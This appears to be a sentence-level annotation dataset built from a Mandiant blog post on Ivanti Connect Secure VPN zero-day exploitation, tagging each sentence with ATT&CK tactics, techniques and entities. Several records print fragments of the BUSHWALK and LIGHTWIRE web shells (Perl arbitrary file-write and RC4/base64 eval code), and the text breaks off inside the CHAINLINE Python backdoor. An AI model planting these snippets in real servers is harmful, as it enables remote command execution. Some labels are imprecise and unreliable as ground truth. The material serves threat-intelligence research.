"doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation | Google Cloud Blog Threat Intelligence Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation January 31, 2024 Written by: Matt Lin, Robert Wallace, John Wolfram, Dimiter Andonov, Tyler Mclellan", "sentence_text": "On Jan. 12, 2024, Mandiant published a blog post detailing two high-impact zero-day vulnerabilities, CVE-2023-46805 and CVE-2024-21887 , affecting Ivanti Connect Secure VPN (CS, formerly Pulse Secure) and Ivanti Policy Secure (PS) appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s3-8d4e7a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "On Jan. 12, 2024, Mandiant published a blog post detailing two high-impact zero-day vulnerabilities, CVE-2023-46805 and CVE-2024-21887 , affecting Ivanti Connect Secure VPN (CS, formerly Pulse Secure) and Ivanti Policy Secure (PS) appliances.", "sentence_text": "On Jan. 31, 2024, Ivanti disclosed two additional vulnerabilities impacting CS and PS devices, CVE-2024-21888 and CVE-2024-21893.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s4-30bf15", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "On Jan. 31, 2024, Ivanti disclosed two additional vulnerabilities impacting CS and PS devices, CVE-2024-21888 and CVE-2024-21893.", "sentence_text": "The vulnerabilities allow for an unauthenticated threat actor to execute arbitrary commands on the appliance with elevated privileges.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "execute arbitrary commands on the appliance with elevated privileges", "entities": [ { "text": "unauthenticated threat actor", "start": 33, "end": 61, "label": "ThreatActor" }, { "text": "execute arbitrary commands on the appliance with elevated privileges", "start": 65, "end": 133, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s5-f3b4b9", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "The vulnerabilities allow for an unauthenticated threat actor to execute arbitrary commands on the appliance with elevated privileges.", "sentence_text": "As previously reported, Mandiant has identified zero-day exploitation of these vulnerabilities in the wild beginning as early as Dec. 3, 2023 by a suspected China-nexus espionage threat actor currently being tracked as UNC5221", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "zero-day exploitation in the wild", "entities": [ { "text": "China-nexus espionage threat actor", "start": 157, "end": 191, "label": "ThreatActor" }, { "text": "UNC5221", "start": 219, "end": 226, "label": "ThreatActor" }, { "text": "zero-day exploitation", "start": 48, "end": 69, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s6-f0a71c", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "As previously reported, Mandiant has identified zero-day exploitation of these vulnerabilities in the wild beginning as early as Dec. 3, 2023 by a suspected China-nexus espionage threat actor currently being tracked as UNC5221", "sentence_text": "In this follow-up blog post, we detail additional tactics, techniques, and procedures (TTPs) employed by UNC5221 and other threat groups during post-exploitation activity across our incident response engagements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s7-4ae004", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "In this follow-up blog post, we detail additional tactics, techniques, and procedures (TTPs) employed by UNC5221 and other threat groups during post-exploitation activity across our incident response engagements.", "sentence_text": "We also detail new malware families and variants to previously identified malware families being used by UNC5221.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s8-669f52", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "We also detail new malware families and variants to previously identified malware families being used by UNC5221.", "sentence_text": "We acknowledge the possibility that one or more related groups may be associated with the activity described in this blog post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s9-88b481", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "We acknowledge the possibility that one or more related groups may be associated with the activity described in this blog post.", "sentence_text": "It is likely that additional groups beyond UNC5221 have adopted one or more of these tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s10-48a150", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "It is likely that additional groups beyond UNC5221 have adopted one or more of these tools.", "sentence_text": "Ivanti recommends customers awaiting patches to apply the mitigation , run the external Integrity Checker Tool (ICT) to check for evidence of exploitation, and continue following the KB article to receive product updates as they become available.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s11-a69945", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "Ivanti recommends customers awaiting patches to apply the mitigation , run the external Integrity Checker Tool (ICT) to check for evidence of exploitation, and continue following the KB article to receive product updates as they become available.", "sentence_text": "Post Exploitation Activity Updates Mitigation Bypass A mitigation bypass technique was recently identified that led to the deployment of a custom webshell tracked as BUSHWALK .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "deployment of a custom webshell tracked as BUSHWALK", "entities": [ { "text": "BUSHWALK", "start": 166, "end": 174, "label": "MalwareTool" }, { "text": "mitigation bypass", "start": 55, "end": 72, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s12-4689f0", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "Post Exploitation Activity Updates Mitigation Bypass A mitigation bypass technique was recently identified that led to the deployment of a custom webshell tracked as BUSHWALK .", "sentence_text": "Successful exploitation would bypass the initial mitigation provided by Ivanti on Jan. 10, 2024.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1211", "name": "Exploitation for Defense Evasion" } ], "procedure": "exploitation would bypass the initial mitigation", "entities": [ { "text": "exploitation", "start": 11, "end": 23, "label": "Action" }, { "text": "bypass the initial mitigation", "start": 30, "end": 59, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s13-3eafcb", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Successful exploitation would bypass the initial mitigation provided by Ivanti on Jan. 10, 2024.", "sentence_text": "At this time, Mandiant assesses the mitigation bypass activity is highly targeted, limited, and is distinct from the post-advisory mass exploitation activity.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1211", "name": "Exploitation for Defense Evasion" } ], "procedure": "mitigation bypass activity", "entities": [ { "text": "mitigation bypass", "start": 36, "end": 53, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s14-3ccbcc", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "At this time, Mandiant assesses the mitigation bypass activity is highly targeted, limited, and is distinct from the post-advisory mass exploitation activity.", "sentence_text": "Note:\nThe external ICT successfully detected the presence of the new web shell.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "ICT successfully detected the new web shell", "entities": [ { "text": "web shell", "start": 69, "end": 78, "label": "MalwareTool" }, { "text": "successfully detected", "start": 23, "end": 44, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s15-6d1bb6", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "Note:\nThe external ICT successfully detected the presence of the new web shell.", "sentence_text": "We have observed the threat actor clean up traces of their activity and restore the system to a clean state after deploying BUSHWALK through the mitigation bypass technique.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "clean up traces of their activity and restore the system to a clean state", "entities": [ { "text": "threat actor", "start": 21, "end": 33, "label": "ThreatActor" }, { "text": "BUSHWALK", "start": 124, "end": 132, "label": "MalwareTool" }, { "text": "clean up traces of their", "start": 34, "end": 58, "label": "Action" }, { "text": "activity", "start": 59, "end": 67, "label": "Action" }, { "text": "restore the system to a clean state", "start": 72, "end": 107, "label": "Action" }, { "text": "deploying", "start": 114, "end": 123, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s16-e8968a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "We have observed the threat actor clean up traces of their activity and restore the system to a clean state after deploying BUSHWALK through the mitigation bypass technique.", "sentence_text": "The ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if they have returned the appliance to a clean state.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "returned the appliance to a clean state", "entities": [ { "text": "threat actor", "start": 90, "end": 102, "label": "ThreatActor" }, { "text": "ICT", "start": 4, "end": 7, "label": "Infrastructure_Indicator" }, { "text": "detect", "start": 83, "end": 89, "label": "Action" }, { "text": "returned the appliance to a clean state", "start": 125, "end": 164, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s17-3cd599", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "The ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if they have returned the appliance to a clean state.", "sentence_text": "In addition, the patches address and fix the mitigation bypass.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1211", "name": "Exploitation for Defense Evasion" } ], "procedure": "patches address and fix the mitigation bypass", "entities": [ { "text": "address", "start": 25, "end": 32, "label": "Action" }, { "text": "fix the mitigation bypass", "start": 37, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s18-c8b741", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "In addition, the patches address and fix the mitigation bypass.", "sentence_text": "Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and is embedded into a legitimate CS file, querymanifest.cgi .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "embedded into a legitimate CS file, querymanifest.cgi", "entities": [ { "text": "web shells", "start": 17, "end": 27, "label": "MalwareTool" }, { "text": "BUSHWALK", "start": 55, "end": 63, "label": "MalwareTool" }, { "text": "querymanifest.cgi", "start": 126, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "embedded into a legitimate CS file", "start": 90, "end": 124, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s19-003c0c", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and is embedded into a legitimate CS file, querymanifest.cgi .", "sentence_text": "BUSHWALK provides a threat actor the ability to execute arbitrary commands or write files to a server.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "execute arbitrary commands or write files to a server", "entities": [ { "text": "threat actor", "start": 20, "end": 32, "label": "ThreatActor" }, { "text": "BUSHWALK", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "execute arbitrary commands", "start": 48, "end": 74, "label": "Action" }, { "text": "write files to a server", "start": 78, "end": 101, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s20-4e28ec", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "BUSHWALK provides a threat actor the ability to execute arbitrary commands or write files to a server.", "sentence_text": "It uses Base64 and RC4 to decode and decrypt the threat actor’s payload in the web request’s command parameter.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Uses Base64 and RC4 to decode and decrypt the threat actor’s payload in the web request command parameter.", "entities": [ { "text": "Base64", "start": 8, "end": 14, "label": "MalwareTool" }, { "text": "RC4", "start": 19, "end": 22, "label": "MalwareTool" }, { "text": "decode", "start": 26, "end": 32, "label": "Action" }, { "text": "decrypt", "start": 37, "end": 44, "label": "Action" }, { "text": "threat actor", "start": 49, "end": 61, "label": "ThreatActor" }, { "text": "web request’s command parameter", "start": 79, "end": 110, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s21-c499df", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "It uses Base64 and RC4 to decode and decrypt the threat actor’s payload in the web request’s command parameter.", "sentence_text": "Entry point to BUSHWALK execution The decrypted payload determines if the web shell should execute a command or write a file to the server.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "execute a command or write a file to the server", "entities": [ { "text": "BUSHWALK", "start": 15, "end": 23, "label": "MalwareTool" }, { "text": "execute a command", "start": 91, "end": 108, "label": "Action" }, { "text": "write a file", "start": 112, "end": 124, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s22-49ecbc", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "Entry point to BUSHWALK execution The decrypted payload determines if the web shell should execute a command or write a file to the server.", "sentence_text": "If the decrypted payload contains change , BUSHWALK calls the changeData function to execute an arbitrary command on the compromised appliance.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "BUSHWALK invokes changeData function to execute arbitrary commands on the compromised appliance.", "entities": [ { "text": "BUSHWALK", "start": 43, "end": 51, "label": "MalwareTool" }, { "text": "calls the changeData function to execute an arbitrary command", "start": 52, "end": 113, "label": "Action" }, { "text": "execute an arbitrary command on the compromised appliance", "start": 85, "end": 142, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s23-356b44", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "If the decrypted payload contains change , BUSHWALK calls the changeData function to execute an arbitrary command on the compromised appliance.", "sentence_text": "The malware first extracts the command from the buffer.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "extracts the command from the buffer", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "extracts the command", "start": 18, "end": 38, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s24-dd4e4d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "The malware first extracts the command from the buffer.", "sentence_text": "The malware then executes the command and encrypts the command results with RC4 using the provided key.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "executes the command and encrypts the command results with RC4", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "executes the command", "start": 17, "end": 37, "label": "Action" }, { "text": "encrypts the command results with RC4", "start": 42, "end": 79, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s25-30e607", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "The malware then executes the command and encrypts the command results with RC4 using the provided key.", "sentence_text": "If the decrypted payload contains update , BUSHWALK calls the updateVersion function to write an arbitrary file to the server.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "BUSHWALK calls the updateVersion function to write an arbitrary file", "entities": [ { "text": "BUSHWALK", "start": 43, "end": 51, "label": "MalwareTool" }, { "text": "write an arbitrary file", "start": 88, "end": 111, "label": "Action" }, { "text": "calls the updateVersion function", "start": 52, "end": 84, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s26-2d28a7", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "If the decrypted payload contains update , BUSHWALK calls the updateVersion function to write an arbitrary file to the server.", "sentence_text": "It extracts a file path and the data to write to the file from the buffer.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "extracts a file path and the data to write to the file", "entities": [ { "text": "extracts a file path and the data to write to the file", "start": 3, "end": 57, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s27-070373", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "It extracts a file path and the data to write to the file from the buffer.", "sentence_text": "This file data is then Base64-decoded and written to the file at the specified path.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Base64-decoded and written to the file", "entities": [ { "text": "Base64-decoded", "start": 23, "end": 37, "label": "Action" }, { "text": "written to the file", "start": 42, "end": 61, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s28-252420", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "This file data is then Base64-decoded and written to the file at the specified path.", "sentence_text": "sub updateVersion\n{\nmy ($fname, $strbuf) = @_;\n$strbuf = MIME::Base64::decode($strbuf);\nCORE::open(my $file, \">>\",$fname) or return undef;\nsyswrite($file, $strbuf);\nclose($file);\nprint CGI::header();\nprint \"over\";\n}\nLIGHTWIRE Variant\nLIGHTWIRE\nweb shell that inserts itself into a legitimate component of the VPN gateway, compcheckresult.cgi", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "inserts itself into a legitimate component", "entities": [ { "text": "LIGHTWIRE", "start": 216, "end": 225, "label": "MalwareTool" }, { "text": "web shell", "start": 244, "end": 253, "label": "Infrastructure_Indicator" }, { "text": "VPN gateway", "start": 309, "end": 320, "label": "Infrastructure_Indicator" }, { "text": "compcheckresult.cgi", "start": 322, "end": 341, "label": "Infrastructure_Indicator" }, { "text": "inserts itself into a legitimate component", "start": 259, "end": 301, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s29-3fdc47", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "sub updateVersion\n{\nmy ($fname, $strbuf) = @_;\n$strbuf = MIME::Base64::decode($strbuf);\nCORE::open(my $file, \">>\",$fname) or return undef;\nsyswrite($file, $strbuf);\nclose($file);\nprint CGI::header();\nprint \"over\";\n}\nLIGHTWIRE Variant\nLIGHTWIRE\nweb shell that inserts itself into a legitimate component of the VPN gateway, compcheckresult.cgi", "sentence_text": "The new sample utilizes the same GET parameters as the original LIGHTWIRE sample described in our first blog post.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "utilizes the same GET parameters", "entities": [ { "text": "LIGHTWIRE", "start": 64, "end": 73, "label": "MalwareTool" }, { "text": "utilizes", "start": 15, "end": 23, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s30-33a828", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "The new sample utilizes the same GET parameters as the original LIGHTWIRE sample described in our first blog post.", "sentence_text": "/dana-na/auth/url_default/compcheckresult.cgi?comp=comp&compid=\nThe new variant of LIGHTWIRE features a different obfuscation routine.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "features a different obfuscation routine", "entities": [ { "text": "LIGHTWIRE", "start": 104, "end": 113, "label": "MalwareTool" }, { "text": "/dana-na/auth/url_default/compcheckresult.cgi?comp=comp&compid=", "start": 0, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "obfuscation", "start": 135, "end": 146, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s31-83d3fe", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "/dana-na/auth/url_default/compcheckresult.cgi?comp=comp&compid=\nThe new variant of LIGHTWIRE features a different obfuscation routine.", "sentence_text": "It first assigns a string scalar variable to $useCompOnly .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "assigns a string scalar variable to $useCompOnly", "entities": [ { "text": "assigns a string scalar variable", "start": 9, "end": 41, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s32-33e8f3", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "It first assigns a string scalar variable to $useCompOnly .", "sentence_text": "Next, it will use the Perl tr operator to transform the string using a character-by-character translation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "use the Perl tr operator to transform the string", "entities": [ { "text": "transform the string", "start": 42, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s33-45c454", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "Next, it will use the Perl tr operator to transform the string using a character-by-character translation.", "sentence_text": "The key is then Base64-decoded and used to RC4 decrypt the incoming request.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Base64-decoded and used to RC4 decrypt the incoming request", "entities": [ { "text": "Base64-decoded", "start": 16, "end": 30, "label": "Action" }, { "text": "RC4 decrypt", "start": 43, "end": 54, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s34-ac0e8e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "The key is then Base64-decoded and used to RC4 decrypt the incoming request.", "sentence_text": "Finally, the issued command is executed by calling eval my $useCompOnly = \"\";\n$useCompOnly =~ tr///;\neval{my $c=Crypt::RC4->new(decode_base64($useCompOnly));my\n$d=$c->RC4(decode_base64(CGI::param('compid')));eval $d;}or\ndo{$Main::remedy1 = \"Compatibility check: $@\";} The original LIGHTWIRE sample detailed in our first blog post contains a simpler obfuscation routine.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "command is executed by calling eval", "entities": [ { "text": "original LIGHTWIRE sample", "start": 302, "end": 327, "label": "MalwareTool" }, { "text": "issued command is executed", "start": 13, "end": 39, "label": "Action" }, { "text": "simpler obfuscation routine", "start": 371, "end": 398, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s35-d0b553", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "Finally, the issued command is executed by calling eval my $useCompOnly = \"\";\n$useCompOnly =~ tr///;\neval{my $c=Crypt::RC4->new(decode_base64($useCompOnly));my\n$d=$c->RC4(decode_base64(CGI::param('compid')));eval $d;}or\ndo{$Main::remedy1 = \"Compatibility check: $@\";} The original LIGHTWIRE sample detailed in our first blog post contains a simpler obfuscation routine.", "sentence_text": "It will initialize an RC4 object and then immediately use the RC4 object to decrypt the issued command.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "initialize an RC4 object and use it to decrypt the issued command", "entities": [ { "text": "initialize an RC4 object", "start": 8, "end": 32, "label": "Action" }, { "text": "use the RC4 object to decrypt the issued command", "start": 54, "end": 102, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s36-dbaa85", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "It will initialize an RC4 object and then immediately use the RC4 object to decrypt the issued command.", "sentence_text": "eval{my $c=Crypt::RC4->new(\"\");my\n$d=$c->RC4(decode_base64(CGI::param('compid')));eval $d;\nCHAINLINE Web Shell", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s37-4ce6ca", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "eval{my $c=Crypt::RC4->new(\"\");my\n$d=$c->RC4(decode_base64(CGI::param('compid')));eval $d;\nCHAINLINE Web Shell", "sentence_text": "After the initial exploitation of an appliance, Mandiant identified UNC5221 leveraging a custom web shell that Mandiant is tracking as CHAINLINE .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "leveraging a custom web shell that Mandiant is tracking as CHAINLINE", "entities": [ { "text": "UNC5221", "start": 68, "end": 75, "label": "ThreatActor" }, { "text": "web shell", "start": 96, "end": 105, "label": "MalwareTool" }, { "text": "CHAINLINE", "start": 135, "end": 144, "label": "MalwareTool" }, { "text": "initial exploitation", "start": 10, "end": 30, "label": "Action" }, { "text": "leveraging", "start": 76, "end": 86, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s38-2ac5bc", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "After the initial exploitation of an appliance, Mandiant identified UNC5221 leveraging a custom web shell that Mandiant is tracking as CHAINLINE .", "sentence_text": "CHAINLINE is a Python web shell backdoor that is embedded in a Ivanti Connect Secure Python package that enables arbitrary command execution.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "embedded in a Ivanti Connect Secure Python package to enable arbitrary command execution", "entities": [ { "text": "CHAINLINE", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "web shell backdoor", "start": 22, "end": 40, "label": "MalwareTool" }, { "text": "enables arbitrary command execution", "start": 105, "end": 140, "label": "Action" }, { "text": "Ivanti Connect Secure Python package", "start": 63, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "embedded", "start": 49, "end": 57, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s39-176599", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "CHAINLINE is a Python web shell backdoor that is embedded in a Ivanti Connect Secure Python package that enables arbitrary command execution.", "sentence_text": "CHAINLINE was identified in the CAV Python package in the following path:\n/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/health.py\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s40-20b1e1", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "CHAINLINE was identified in the CAV Python package in the following path:\n/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/health.py\n.", "sentence_text": "This is the same Python package modified to support the WIREFIRE web shell.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "modified to support the WIREFIRE web shell", "entities": [ { "text": "WIREFIRE", "start": 56, "end": 64, "label": "MalwareTool" }, { "text": "Python package", "start": 17, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "modified", "start": 32, "end": 40, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s41-3f8a28", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "This is the same Python package modified to support the WIREFIRE web shell.", "sentence_text": "#\n# Copyright (c) 2018 by Pulse Secure, LLC.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s42-0d330e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "#\n# Copyright (c) 2018 by Pulse Secure, LLC.", "sentence_text": "All rights reserved # import base64 from flask_restful import Resource, reqparse from flask import request import subprocess RC4_KEY = \"\" def crypt(command: str):\ntmp = list(command)\nfor i in range(len(tmp)):\ntmp[i] = chr(ord(tmp[i]) ^", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s43-1fa05b", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "All rights reserved # import base64 from flask_restful import Resource, reqparse from flask import request import subprocess RC4_KEY = \"\" def crypt(command: str):\ntmp = list(command)\nfor i in 